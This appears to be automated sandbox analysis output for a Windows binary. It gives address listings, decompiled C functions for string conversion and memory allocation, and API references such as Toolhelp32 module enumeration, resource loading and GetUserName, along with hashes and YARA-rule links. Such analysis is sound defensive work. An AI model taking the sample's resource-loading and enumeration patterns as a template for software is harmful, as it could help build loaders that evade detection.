                                                                                                                                                  0x004023b4
                                                                                                                                                  0x004023ba
                                                                                                                                                  0x004023ba
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023ce
                                                                                                                                                  0x004023d1
                                                                                                                                                  0x004023d3
                                                                                                                                                  0x004023dd
                                                                                                                                                  0x004023ec
                                                                                                                                                  0x004023ef
                                                                                                                                                  0x004023fe
                                                                                                                                                  0x00402401
                                                                                                                                                  0x00402403
                                                                                                                                                  0x00402411
                                                                                                                                                  0x00402417
                                                                                                                                                  0x00402424
                                                                                                                                                  0x00402426
                                                                                                                                                  0x0040242a
                                                                                                                                                  0x0040242c
                                                                                                                                                  0x00402434
                                                                                                                                                  0x00402434
                                                                                                                                                  0x0040243a
                                                                                                                                                  0x0040243f
                                                                                                                                                  0x00402443
                                                                                                                                                  0x00402445
                                                                                                                                                  0x0040244d
                                                                                                                                                  0x0040244d
                                                                                                                                                  0x00402445
                                                                                                                                                  0x00402251
                                                                                                                                                  0x0040223d
                                                                                                                                                  0x0040244f
                                                                                                                                                  0x0040245d
                                                                                                                                                  0x0040245f
                                                                                                                                                  0x00402461
                                                                                                                                                  0x00402462
                                                                                                                                                  0x00402467
                                                                                                                                                  0x00402467
                                                                                                                                                  0x0040245f
                                                                                                                                                  0x004021ca
                                                                                                                                                  0x0040246a
                                                                                                                                                  0x0040246e
                                                                                                                                                  0x00402470
                                                                                                                                                  0x00402478
                                                                                                                                                  0x00402478
                                                                                                                                                  0x0040247a
                                                                                                                                                  0x0040247e
                                                                                                                                                  0x00402480
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00402480
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c55
                                                                                                                                                  0x00401c62
                                                                                                                                                  0x00401c67
                                                                                                                                                  0x00401c6a
                                                                                                                                                  0x00401c6c
                                                                                                                                                  0x00401c73
                                                                                                                                                  0x00401c73
                                                                                                                                                  0x00401c77
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c7b
                                                                                                                                                  0x00401c8f
                                                                                                                                                  0x00401c8f
                                                                                                                                                  0x00401c7d
                                                                                                                                                  0x00401c7d
                                                                                                                                                  0x00401c83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c85
                                                                                                                                                  0x00401c85
                                                                                                                                                  0x00401c88
                                                                                                                                                  0x00401c8d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c8d
                                                                                                                                                  0x00401c83
                                                                                                                                                  0x00401c98
                                                                                                                                                  0x00401c9a
                                                                                                                                                  0x00401cbd
                                                                                                                                                  0x00401cc2
                                                                                                                                                  0x00401cc5
                                                                                                                                                  0x00401cc7
                                                                                                                                                  0x00401cd0
                                                                                                                                                  0x00401cd0
                                                                                                                                                  0x00401cd2
                                                                                                                                                  0x00401cd4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cd6
                                                                                                                                                  0x00401cd8
                                                                                                                                                  0x00401cec
                                                                                                                                                  0x00401cec
                                                                                                                                                  0x00401cda
                                                                                                                                                  0x00401cda
                                                                                                                                                  0x00401cdd
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401ce2
                                                                                                                                                  0x00401ce2
                                                                                                                                                  0x00401ce5
                                                                                                                                                  0x00401ce8
                                                                                                                                                  0x00401cea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cea
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00401cf5
                                                                                                                                                  0x00401cf5
                                                                                                                                                  0x00401cf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cf9
                                                                                                                                                  0x00401d02
                                                                                                                                                  0x00401d07
                                                                                                                                                  0x00401d09
                                                                                                                                                  0x00401d10
                                                                                                                                                  0x00401d1d
                                                                                                                                                  0x00401d22
                                                                                                                                                  0x00401d25
                                                                                                                                                  0x00401d27
                                                                                                                                                  0x00401d30
                                                                                                                                                  0x00401d30
                                                                                                                                                  0x00401d32
                                                                                                                                                  0x00401d34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d36
                                                                                                                                                  0x00401d38
                                                                                                                                                  0x00401d4c
                                                                                                                                                  0x00401d4c
                                                                                                                                                  0x00401d3a
                                                                                                                                                  0x00401d3a
                                                                                                                                                  0x00401d3d
                                                                                                                                                  0x00401d40
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d42
                                                                                                                                                  0x00401d42
                                                                                                                                                  0x00401d45
                                                                                                                                                  0x00401d48
                                                                                                                                                  0x00401d4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d4a
                                                                                                                                                  0x00401d40
                                                                                                                                                  0x00401d55
                                                                                                                                                  0x00401d55
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d5d
                                                                                                                                                  0x00401d6a
                                                                                                                                                  0x00401d6f
                                                                                                                                                  0x00401d72
                                                                                                                                                  0x00401d74
                                                                                                                                                  0x00401d80
                                                                                                                                                  0x00401d80
                                                                                                                                                  0x00401d82
                                                                                                                                                  0x00401d84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d86
                                                                                                                                                  0x00401d88
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00401d8a
                                                                                                                                                  0x00401d8a
                                                                                                                                                  0x00401d8d
                                                                                                                                                  0x00401d90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d92
                                                                                                                                                  0x00401d92
                                                                                                                                                  0x00401d95
                                                                                                                                                  0x00401d98
                                                                                                                                                  0x00401d9a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d9a
                                                                                                                                                  0x00401d90
                                                                                                                                                  0x00401da5
                                                                                                                                                  0x00401da5
                                                                                                                                                  0x00401da7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401da7
                                                                                                                                                  0x00401da0
                                                                                                                                                  0x00401da2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401da2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00401d50
                                                                                                                                                  0x00401d52
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401dad
                                                                                                                                                  0x00401db6
                                                                                                                                                  0x00401dbb
                                                                                                                                                  0x00401dbb
                                                                                                                                                  0x00401d10
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d09
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cf7
                                                                                                                                                  0x00401cf0
                                                                                                                                                  0x00401cf2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c9c
                                                                                                                                                  0x00401c9c
                                                                                                                                                  0x00401c9d
                                                                                                                                                  0x00401caf
                                                                                                                                                  0x00401caf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c9a
                                                                                                                                                  0x00401c93
                                                                                                                                                  0x00401c95
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c95
                                                                                                                                                  0x00401c4f
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                  • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00401AD6
                                                                                                                                                  • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                  • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                  • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                  • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                  • API String ID: 2366190142-2962942730
                                                                                                                                                  • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                  • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                  • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                  • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                                                                  0x004018f0
                                                                                                                                                  0x004018f2
                                                                                                                                                  0x004018f6
                                                                                                                                                  0x004018fa
                                                                                                                                                  0x00401917
                                                                                                                                                  0x0040191a
                                                                                                                                                  0x0040192f
                                                                                                                                                  0x00401939
                                                                                                                                                  0x0040193b
                                                                                                                                                  0x0040193e
                                                                                                                                                  0x00401940
                                                                                                                                                  0x00401949
                                                                                                                                                  0x0040195e
                                                                                                                                                  0x0040196b
                                                                                                                                                  0x00401980
                                                                                                                                                  0x0040198a
                                                                                                                                                  0x0040198c
                                                                                                                                                  0x0040198c
                                                                                                                                                  0x0040198f
                                                                                                                                                  0x00401991
                                                                                                                                                  0x00401991
                                                                                                                                                  0x0040198f
                                                                                                                                                  0x0040199a
                                                                                                                                                  0x004018fc
                                                                                                                                                  0x004018fc
                                                                                                                                                  0x00401900
                                                                                                                                                  0x00401900

                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3322701435-0
                                                                                                                                                  • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                  • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                  • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                  • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F722BF, Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 04F72340
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 04F7237D
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 04F723BA
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04F72413
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: 5f94d3f296911805950307e29822745d6f31a752734b3350161ff0a52274cbcf
                                                                                                                                                  • Instruction ID: 74f84a2951095fe62f9c0a91351d760da251b80efea1c19fca546025e9dcb044
                                                                                                                                                  • Opcode Fuzzy Hash: 5f94d3f296911805950307e29822745d6f31a752734b3350161ff0a52274cbcf
                                                                                                                                                  • Instruction Fuzzy Hash: 7D5166B09002498FEB10CFA9D5887DEBBF0FF49308F10849AE459A7751C778A946CB66
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F722E0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 04F72340
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 04F7237D
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 04F723BA
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04F72413
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: f1f6aa0f92451564f6d9438ca08089c95872f96b77c61258c5b5eb34a60af341
                                                                                                                                                  • Instruction ID: 669a88b37c8a20414f34d1c3bf1c2b8922fdcb81787d048393fb7682f4d35311
                                                                                                                                                  • Opcode Fuzzy Hash: f1f6aa0f92451564f6d9438ca08089c95872f96b77c61258c5b5eb34a60af341
                                                                                                                                                  • Instruction Fuzzy Hash: E55144B09002098FEB10CFAAD548BDEBBF0FB48304F20855AE419A7760C778A845CB66
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

















                                                                                                                                                  0x0040af66
                                                                                                                                                  0x0040af66
                                                                                                                                                  0x0040af69
                                                                                                                                                  0x0040af7d
                                                                                                                                                  0x0040af80
                                                                                                                                                  0x0040af88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af73
                                                                                                                                                  0x0040af79
                                                                                                                                                  0x0040af7b
                                                                                                                                                  0x0040af8c
                                                                                                                                                  0x0040af98
                                                                                                                                                  0x0040af9a
                                                                                                                                                  0x0040af9a
                                                                                                                                                  0x0040afa3
                                                                                                                                                  0x0040afad
                                                                                                                                                  0x0040afb2
                                                                                                                                                  0x0040afb7
                                                                                                                                                  0x0040afc5
                                                                                                                                                  0x0040afca
                                                                                                                                                  0x0040afd0
                                                                                                                                                  0x0040aec2
                                                                                                                                                  0x0040b6b5
                                                                                                                                                  0x0040b6b7
                                                                                                                                                  0x0040b6bc
                                                                                                                                                  0x0040b6c1
                                                                                                                                                  0x0040b6c4
                                                                                                                                                  0x0040b6c6
                                                                                                                                                  0x0040b6c8
                                                                                                                                                  0x0040b6cf
                                                                                                                                                  0x0040b714
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b6d1
                                                                                                                                                  0x0040b6d3
                                                                                                                                                  0x0040b6d9
                                                                                                                                                  0x0040b6de
                                                                                                                                                  0x0040b6e4
                                                                                                                                                  0x0040b6e7
                                                                                                                                                  0x0040b6e9
                                                                                                                                                  0x0040b6eb
                                                                                                                                                  0x0040b6ec
                                                                                                                                                  0x0040b6ed
                                                                                                                                                  0x0040b6f3
                                                                                                                                                  0x0040b6f4
                                                                                                                                                  0x0040b6fb
                                                                                                                                                  0x0040b700
                                                                                                                                                  0x0040b704
                                                                                                                                                  0x0040b706
                                                                                                                                                  0x0040b715
                                                                                                                                                  0x0040b723
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b727
                                                                                                                                                  0x0040b73a
                                                                                                                                                  0x0040b73c
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b704
                                                                                                                                                  0x0040b6cf
                                                                                                                                                  0x0040b742
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af7b
                                                                                                                                                  0x0040af8b
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                    • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1411284514-0
                                                                                                                                                  • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                  • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                  • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                  • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A64CA0, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b49f83f6e070a952d08a1a4b0dcb3b87bd682b21b7b470bda84d030e2baa0b5
                                                                                                                                                  • Instruction ID: a25659cd94d1eb612b09795308f9e64a96209ff9f45ce8757b84102c5294f26f
                                                                                                                                                  • Opcode Fuzzy Hash: 7b49f83f6e070a952d08a1a4b0dcb3b87bd682b21b7b470bda84d030e2baa0b5
                                                                                                                                                  • Instruction Fuzzy Hash: 58510470E142188FDB14CFA9C899BDDBBB1FF48318F148559D826AB350D778A844CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A64C88, Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A67593
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                  • Opcode ID: b28f48573661d77409ef01f5f20a02a0d807212b23322df27dbcb19d95ffd2f3
                                                                                                                                                  • Instruction ID: b16aeace580e5d4e9e4ff4a1321050c1540492a636e60cba0ad0d032a01f1608
                                                                                                                                                  • Opcode Fuzzy Hash: b28f48573661d77409ef01f5f20a02a0d807212b23322df27dbcb19d95ffd2f3
                                                                                                                                                  • Instruction Fuzzy Hash: 65511270E102188FDB14CFA9C898BEDBBB1FF48318F148159D826AB390D778A844CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A6744C, Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A67593
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                  • Opcode ID: 0e52fa12ee0ef9f389a4bb302659519027235d7c8738fa33532180981dde6c79
                                                                                                                                                  • Instruction ID: b7686062aee52de4e345f623053f7d738a0f4f585202f8c3ef7c422787b00417
                                                                                                                                                  • Opcode Fuzzy Hash: 0e52fa12ee0ef9f389a4bb302659519027235d7c8738fa33532180981dde6c79
                                                                                                                                                  • Instruction Fuzzy Hash: C551F370E102188FDB14CFA9C899B9DBBB5FF48318F158159E826BB350DB78A844CF95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 05A64CAC, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A67593
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                  • Opcode ID: fe077b40ea5cd9ae0f710753ee36ea9d0fcedb4cb33573ee97a7203d70e8b1d0
                                                                                                                                                  • Instruction ID: 686d638c474cdb2be2d8c096914a1d523e7ba89b9150f240ac6825e171cc3af8
                                                                                                                                                  • Opcode Fuzzy Hash: fe077b40ea5cd9ae0f710753ee36ea9d0fcedb4cb33573ee97a7203d70e8b1d0
                                                                                                                                                  • Instruction Fuzzy Hash: ED51F370E102188FDB14CFA9C889BADBBB1FF48318F158559E826BB350D778A844CF95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F70A24, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F70B42
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936001110.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: a6290d9a6c99c182a765828fcb5da92642816638cc0336453658cc66c7d432a6
                                                                                                                                                  • Instruction ID: bffe9cbd1c3b5d037d0cb0202749b16e5f8a0fd0954f33dd691e9a0bc2b3ef1f
                                                                                                                                                  • Opcode Fuzzy Hash: a6290d9a6c99c182a765828fcb5da92642816638cc0336453658cc66c7d432a6
                                                                                                                                                  • Instruction Fuzzy Hash: 9351C2B1D10349DFDB14CFA9C884ADEFBB5BF48314F24852AE819AB210D774A946CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 04F70A30, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
